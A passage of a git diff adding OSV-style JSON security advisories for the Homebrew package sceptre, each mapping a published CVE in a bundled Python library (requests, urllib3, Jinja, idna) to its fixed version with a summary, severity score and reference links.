"https://pyup.io/posts/pyup-discovers-redos-vulnerabilities-in-top-python-packages" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YNA2BAH2ACBZ4TVJZKFLCR7L23BG5C3H" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ADES3NLOE5QJKBLGNZNI2RGVOSQXA37R" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/09/msg00018.html" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/setuptools/compare/v65.5.0...v65.5.1" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/setuptools/blob/fe8a98e696241487ba6ac9f91faa38ade939ec5d/setuptools/package_index.py#L200" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pypa/setuptools" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/setuptools/PYSEC-2022-43012.yaml" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2023-32681.json b/advisories/BREW-sceptre-CVE-2023-32681.json new file mode 100644 index 00000000000..4e0774aa23f --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2023-32681.json @@ -0,0 +1,113 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2023-32681", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "GHSA-j8r2-6x86-q33q", + "CVE-2023-32681", + "PYSEC-2023-74" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.31.0", + "resource": "requests", + "resource_purl": "pkg:pypi/requests@2.34.2" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "requests", + "subject_version": "2.34.2", + "key": "pkg:pypi/requests@2.34.2", + "resource": "requests" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "requests", + "subject_version": "2.34.2", + "key": "pkg:pypi/requests@2.34.2", + "resource": "requests" + } + ] + }, + "summary": "Unintended leak of Proxy-Authorization header in requests", + "details": "### Impact\n\nSince Requests v2.3.0, Requests has been vulnerable to potentially leaking `Proxy-Authorization` headers to destination servers, specifically during redirects to an HTTPS origin. This is a product of how `rebuild_proxies` is used to recompute and [reattach the `Proxy-Authorization` header](https://github.com/psf/requests/blob/f2629e9e3c7ce3c3c8c025bcd8db551101cbc773/requests/sessions.py#L319-L328) to requests when redirected. Note this behavior has _only_ been observed to affect proxied requests when credentials are supplied in the URL user information component (e.g. `https://username:password@proxy:8080`).\n\n**Current vulnerable behavior(s):**\n\n1. HTTP → HTTPS: **leak**\n2. HTTPS → HTTP: **no leak**\n3. HTTPS → HTTPS: **leak**\n4. HTTP → HTTP: **no leak**\n\nFor HTTP connections sent through the proxy, the proxy will identify the header in the request itself and remove it prior to forwarding to the destination server. However when sent over HTTPS, the `Proxy-Authorization` header must be sent in the CONNECT request as the proxy has no visibility into further tunneled requests. This results in Requests forwarding the header to the destination server unintentionally, allowing a malicious actor to potentially exfiltrate those credentials.\n\nThe reason this currently works for HTTPS connections in Requests is the `Proxy-Authorization` header is also handled by urllib3 with our usage of the ProxyManager in adapters.py with [`proxy_manager_for`](https://github.com/psf/requests/blob/f2629e9e3c7ce3c3c8c025bcd8db551101cbc773/requests/adapters.py#L199-L235). This will compute the required proxy headers in `proxy_headers` and pass them to the Proxy Manager, avoiding attaching them directly to the Request object. This will be our preferred option going forward for default usage.\n\n### Patches\nStarting in Requests v2.31.0, Requests will no longer attach this header to redirects with an HTTPS destination. This should have no negative impacts on the default behavior of the library as the proxy credentials are already properly being handled by urllib3's ProxyManager.\n\nFor users with custom adapters, this _may_ be potentially breaking if you were already working around this behavior. The previous functionality of `rebuild_proxies` doesn't make sense in any case, so we would encourage any users impacted to migrate any handling of Proxy-Authorization directly into their custom adapter.\n\n### Workarounds\nFor users who are not able to update Requests immediately, there is one potential workaround.\n\nYou may disable redirects by setting `allow_redirects` to `False` on all calls through Requests top-level APIs. Note that if you're currently relying on redirect behaviors, you will need to capture the 3xx response codes and ensure a new request is made to the redirect destination.\n```\nimport requests\nr = requests.get('http://github.com/', allow_redirects=False)\n```\n\n### Credits\n\nThis vulnerability was discovered and disclosed by the following individuals.\n\nDennis Brinkrolf, Haxolot (https://haxolot.com/)\nTobias Funke, (tobiasfunke93@gmail.com)", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:N/A:N" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/psf/requests/security/advisories/GHSA-j8r2-6x86-q33q" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32681" + }, + { + "type": "WEB", + "url": "https://github.com/psf/requests/commit/74ea7cf7a6a27a4eeb2ae24e162bcc942a6706d5" + }, + { + "type": "PACKAGE", + "url": "https://github.com/psf/requests" + }, + { + "type": "WEB", + "url": "https://github.com/psf/requests/releases/tag/v2.31.0" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/requests/PYSEC-2023-74.yaml" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2023/06/msg00018.html" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AW7HNFGYP44RT3DUDQXG2QT3OEV2PJ7Y" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KOYASTZDGQG2BWLSNBPL3TQRL2G7QYNZ" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202309-08" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2023-43804.json b/advisories/BREW-sceptre-CVE-2023-43804.json new file mode 100644 index 00000000000..4c4faed7327 --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2023-43804.json @@ -0,0 +1,129 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2023-43804", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "GHSA-v845-jxx5-vc9f", + "CVE-2023-43804", + "PYSEC-2023-192" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.0.6", + "resource": "urllib3", + "resource_purl": "pkg:pypi/urllib3@2.7.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "urllib3", + "subject_version": "2.7.0", + "key": "pkg:pypi/urllib3@2.7.0", + "resource": "urllib3" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "urllib3", + "subject_version": "2.7.0", + "key": "pkg:pypi/urllib3@2.7.0", + "resource": "urllib3" + } + ] + }, + "summary": "`Cookie` HTTP header isn't stripped on cross-origin redirects", + "details": "urllib3 doesn't treat the `Cookie` HTTP header special or provide any helpers for managing cookies over HTTP, that is the responsibility of the user. However, it is possible for a user to specify a `Cookie` header and unknowingly leak information via HTTP redirects to a different origin if that user doesn't disable redirects explicitly.\n\nUsers **must** handle redirects themselves instead of relying on urllib3's automatic redirects to achieve safe processing of the `Cookie` header, thus we decided to strip the header by default in order to further protect users who aren't using the correct approach.\n\n## Affected usages\n\nWe believe the number of usages affected by this advisory is low. It requires all of the following to be true to be exploited:\n\n* Using an affected version of urllib3 (patched in v1.26.17 and v2.0.6)\n* Using the `Cookie` header on requests, which is mostly typical for impersonating a browser.\n* Not disabling HTTP redirects\n* Either not using HTTPS or for the origin server to redirect to a malicious origin.\n\n## Remediation\n\n* Upgrading to at least urllib3 v1.26.17 or v2.0.6\n* Disabling HTTP redirects using `redirects=False` when sending requests.\n* Not using the `Cookie` header.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-v845-jxx5-vc9f" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43804" + }, + { + "type": "WEB", + "url": "https://github.com/urllib3/urllib3/commit/01220354d389cd05474713f8c982d05c9b17aafb" + }, + { + "type": "WEB", + "url": "https://github.com/urllib3/urllib3/commit/644124ecd0b6e417c527191f866daa05a5a2056d" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2023-192.yaml" + }, + { + "type": "PACKAGE", + "url": "https://github.com/urllib3/urllib3" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00012.html" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/12/msg00020.html" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I3PR7C6RJ6JUBQKIJ644DMIJSUP36VDY" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NDAGZXYJ7H2G3SB47M453VQVNAWKAEJJ" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20241213-0007" + }, + { + "type": "WEB", + "url": "https://www.vicarius.io/vsociety/posts/cve-2023-43804-urllib3-vulnerability-3" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2023-45803.json b/advisories/BREW-sceptre-CVE-2023-45803.json new file mode 100644 index 00000000000..cc9b83ece68 --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2023-45803.json @@ -0,0 +1,133 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2023-45803", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "GHSA-g4mx-q9vg-27p4", + "CVE-2023-45803", + "PYSEC-2023-212" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.0.7", + "resource": "urllib3", + "resource_purl": "pkg:pypi/urllib3@2.7.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "urllib3", + "subject_version": "2.7.0", + "key": "pkg:pypi/urllib3@2.7.0", + "resource": "urllib3" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "urllib3", + "subject_version": "2.7.0", + "key": "pkg:pypi/urllib3@2.7.0", + "resource": "urllib3" + } + ] + }, + "summary": "urllib3's request body not stripped after redirect from 303 status changes request method to GET", + "details": "urllib3 previously wouldn't remove the HTTP request body when an HTTP redirect response using status 303 \"See Other\" after the request had its method changed from one that could accept a request body (like `POST`) to `GET` as is required by HTTP RFCs. Although the behavior of removing the request body is not specified in the section for redirects, it can be inferred by piecing together information from different sections and we have observed the behavior in other major HTTP client implementations like curl and web browsers.\n\nFrom [RFC 9110 Section 9.3.1](https://www.rfc-editor.org/rfc/rfc9110.html#name-get):\n\n> A client SHOULD NOT generate content in a GET request unless it is made directly to an origin server that has previously indicated, in or out of band, that such a request has a purpose and will be adequately supported.\n\n## Affected usages\n\nBecause the vulnerability requires a previously trusted service to become compromised in order to have an impact on confidentiality we believe the exploitability of this vulnerability is low. Additionally, many users aren't putting sensitive data in HTTP request bodies, if this is the case then this vulnerability isn't exploitable.\n\nBoth of the following conditions must be true to be affected by this vulnerability:\n\n* If you're using urllib3 and submitting sensitive information in the HTTP request body (such as form data or JSON)\n* The origin service is compromised and starts redirecting using 303 to a malicious peer or the redirected-to service becomes compromised.\n\n## Remediation\n\nYou can remediate this vulnerability with any of the following steps:\n\n* Upgrade to a patched version of urllib3 (v1.26.18 or v2.0.7)\n* Disable redirects for services that you aren't expecting to respond with redirects with `redirects=False`.\n* Disable automatic redirects with `redirects=False` and handle 303 redirects manually by stripping the HTTP request body.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:A/AC:L/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-g4mx-q9vg-27p4" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45803" + }, + { + "type": "WEB", + "url": "https://github.com/urllib3/urllib3/commit/4e50fbc5db74e32cabd5ccc1ab81fc103adfe0b3" + }, + { + "type": "WEB", + "url": "https://github.com/urllib3/urllib3/commit/4e98d57809dacab1cbe625fddeec1a290c478ea9" + }, + { + "type": "WEB", + "url": "https://github.com/urllib3/urllib3/commit/b594c5ceaca38e1ac215f916538fb128e3526a36" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2023-212.yaml" + }, + { + "type": "PACKAGE", + "url": "https://github.com/urllib3/urllib3" + }, + { + "type": "WEB", + "url": "https://github.com/urllib3/urllib3/releases/tag/1.26.18" + }, + { + "type": "WEB", + "url": "https://github.com/urllib3/urllib3/releases/tag/2.0.7" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/12/msg00020.html" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4R2Y5XK3WALSR3FNAGN7JBYV2B343ZKB" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PPDPLM6UUMN55ESPQWJFLLIZY4ZKCNRX" + }, + { + "type": "WEB", + "url": "https://www.rfc-editor.org/rfc/rfc9110.html#name-get" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2024-22195.json b/advisories/BREW-sceptre-CVE-2024-22195.json new file mode 100644 index 00000000000..127720e455e --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2024-22195.json @@ -0,0 +1,113 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2024-22195", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "GHSA-h5c8-rqwp-cp95", + "CVE-2024-22195", + "PYSEC-2026-1473" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "3.1.3", + "resource": "jinja2", + "resource_purl": "pkg:pypi/jinja2@3.1.6" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "jinja2", + "subject_version": "3.1.6", + "key": "pkg:pypi/jinja2@3.1.6", + "resource": "jinja2" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "jinja2", + "subject_version": "3.1.6", + "key": "pkg:pypi/jinja2@3.1.6", + "resource": "jinja2" + } + ] + }, + "summary": "Jinja vulnerable to HTML attribute injection when passing user input as keys to xmlattr filter", + "details": "The `xmlattr` filter in affected versions of Jinja accepts keys containing spaces. XML/HTML attributes cannot contain spaces, as each would then be interpreted as a separate attribute. If an application accepts keys (as opposed to only values) as user input, and renders these in pages that other users see as well, an attacker could use this to inject other attributes and perform XSS. Note that accepting keys as user input is not common or a particularly intended use case of the `xmlattr` filter, and an application doing so should already be verifying what keys are provided regardless of this fix.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pallets/jinja/security/advisories/GHSA-h5c8-rqwp-cp95" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22195" + }, + { + "type": "WEB", + "url": "https://github.com/pallets/jinja/commit/716795349a41d4983a9a4771f7d883c96ea17be7" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pallets/jinja" + }, + { + "type": "WEB", + "url": "https://github.com/pallets/jinja/releases/tag/3.1.3" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00010.html" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/12/msg00009.html" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5XCWZD464AJJJUBOO7CMPXQ4ROBC6JX2" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DELCVUUYX75I5K4Q5WMJG4MUZJA6VAIP" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/O7YWRBX6JQCWC2XXCTZ55C7DPMGICCN3" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2024-34064.json b/advisories/BREW-sceptre-CVE-2024-34064.json new file mode 100644 index 00000000000..aaea5c34f7a --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2024-34064.json @@ -0,0 +1,109 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2024-34064", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "GHSA-h75v-3vvj-5mfj", + "CVE-2024-34064", + "PYSEC-2026-1474" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "3.1.4", + "resource": "jinja2", + "resource_purl": "pkg:pypi/jinja2@3.1.6" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "jinja2", + "subject_version": "3.1.6", + "key": "pkg:pypi/jinja2@3.1.6", + "resource": "jinja2" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "jinja2", + "subject_version": "3.1.6", + "key": "pkg:pypi/jinja2@3.1.6", + "resource": "jinja2" + } + ] + }, + "summary": "Jinja vulnerable to HTML attribute injection when passing user input as keys to xmlattr filter", + "details": "The `xmlattr` filter in affected versions of Jinja accepts keys containing non-attribute characters. XML/HTML attributes cannot contain spaces, `/`, `>`, or `=`, as each would then be interpreted as starting a separate attribute. If an application accepts keys (as opposed to only values) as user input, and renders these in pages that other users see as well, an attacker could use this to inject other attributes and perform XSS. The fix for the previous GHSA-h5c8-rqwp-cp95 CVE-2024-22195 only addressed spaces but not other characters.\n\nAccepting keys as user input is now explicitly considered an unintended use case of the `xmlattr` filter, and code that does so without otherwise validating the input should be flagged as insecure, regardless of Jinja version. Accepting _values_ as user input continues to be safe.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pallets/jinja/security/advisories/GHSA-h75v-3vvj-5mfj" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34064" + }, + { + "type": "WEB", + "url": "https://github.com/pallets/jinja/commit/0668239dc6b44ef38e7a6c9f91f312fd4ca581cb" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pallets/jinja" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/12/msg00009.html" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/567XIGSZMABG6TSMYWD7MIYNJSUQQRUC" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCLF44KY43BSVMTE6S53B4V5WP3FRRSE" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SSCBHIL6BYKR5NRCBXP4XMP2CEEKGFVS" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZALNWE3TXPPHVPSI3AZ5CTMSTAVN5UMS" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2024-35195.json b/advisories/BREW-sceptre-CVE-2024-35195.json new file mode 100644 index 00000000000..2969547e8e8 --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2024-35195.json @@ -0,0 +1,101 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2024-35195", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "GHSA-9wx4-h78v-vm56", + "CVE-2024-35195", + "PYSEC-2026-1873" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.32.0", + "resource": "requests", + "resource_purl": "pkg:pypi/requests@2.34.2" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "requests", + "subject_version": "2.34.2", + "key": "pkg:pypi/requests@2.34.2", + "resource": "requests" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "requests", + "subject_version": "2.34.2", + "key": "pkg:pypi/requests@2.34.2", + "resource": "requests" + } + ] + }, + "summary": "Requests `Session` object does not verify requests after making first request with verify=False", + "details": "When using a `requests.Session`, if the first request to a given origin is made with `verify=False`, TLS certificate verification may remain disabled for all subsequent requests to that origin, even if `verify=True` is explicitly specified later.\n\nThis occurs because the underlying connection is reused from the session's connection pool, causing the initial TLS verification setting to persist for the lifetime of the pooled connection. As a result, applications may unintentionally send requests without certificate verification, leading to potential man-in-the-middle attacks and compromised confidentiality or integrity.\n\nThis behavior affects versions of `requests` prior to 2.32.0.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/psf/requests/security/advisories/GHSA-9wx4-h78v-vm56" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-35195" + }, + { + "type": "WEB", + "url": "https://github.com/psf/requests/pull/6655" + }, + { + "type": "WEB", + "url": "https://github.com/psf/requests/commit/a58d7f2ffb4d00b46dca2d70a3932a0b37e22fac" + }, + { + "type": "PACKAGE", + "url": "https://github.com/psf/requests" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IYLSNK5TL46Q6XPRVMHVWS63MVJQOK4Q" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/N7WP6EYDSUOCOJYHDK5NX43PYZ4SNHGZ" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2024-3651.json b/advisories/BREW-sceptre-CVE-2024-3651.json new file mode 100644 index 00000000000..0a41c5dd6b2 --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2024-3651.json @@ -0,0 +1,121 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2024-3651", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "GHSA-jjg7-2v4v-x38h", + "CVE-2024-3651", + "PYSEC-2024-60" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "3.7", + "resource": "idna", + "resource_purl": "pkg:pypi/idna@3.18" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "idna", + "subject_version": "3.18", + "key": "pkg:pypi/idna@3.18", + "resource": "idna" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "idna", + "subject_version": "3.18", + "key": "pkg:pypi/idna@3.18", + "resource": "idna" + } + ] + }, + "summary": "Internationalized Domain Names in Applications (IDNA) vulnerable to denial of service from specially crafted inputs to idna.encode", + "details": "### Impact\nA specially crafted argument to the `idna.encode()` function could consume significant resources. This may lead to a denial-of-service.\n\n### Patches\nThe function has been refined to reject such strings without the associated resource consumption in version 3.7.\n\n### Workarounds\nDomain names cannot exceed 253 characters in length, if this length limit is enforced prior to passing the domain to the `idna.encode()` function it should no longer consume significant resources. This is triggered by arbitrarily large inputs that would not occur in normal usage, but may be passed to the library assuming there is no preliminary input validation by the higher-level application.\n\n### References\n* https://huntr.com/bounties/93d78d07-d791-4b39-a845-cbfabc44aadb", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/kjd/idna/security/advisories/GHSA-jjg7-2v4v-x38h" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3651" + }, + { + "type": "WEB", + "url": "https://github.com/kjd/idna/commit/1d365e17e10d72d0b7876316fc7b9ca0eebdd38d" + }, + { + "type": "PACKAGE", + "url": "https://github.com/kjd/idna" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/idna/PYSEC-2024-60.yaml" + }, + { + "type": "WEB", + "url": "https://huntr.com/bounties/93d78d07-d791-4b39-a845-cbfabc44aadb" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/05/msg00006.html" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4YQUPYH3SVZ5GFF2CDQ55FCM575AZTF2" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/F2S5E23N6E52S46KGNYTDFB75LOC4N4D" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/S5IDLLD2IKSIVRBSLB34WTSYGLMWUFWF" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ULSC7HBJKXB3BZV367WM5BR6DFEC4Z43" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2024-37891.json b/advisories/BREW-sceptre-CVE-2024-37891.json new file mode 100644 index 00000000000..c92303a7b2d --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2024-37891.json @@ -0,0 +1,105 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2024-37891", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "GHSA-34jh-p97f-mpxf", + "CVE-2024-37891", + "PYSEC-2026-1995" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.2.2", + "resource": "urllib3", + 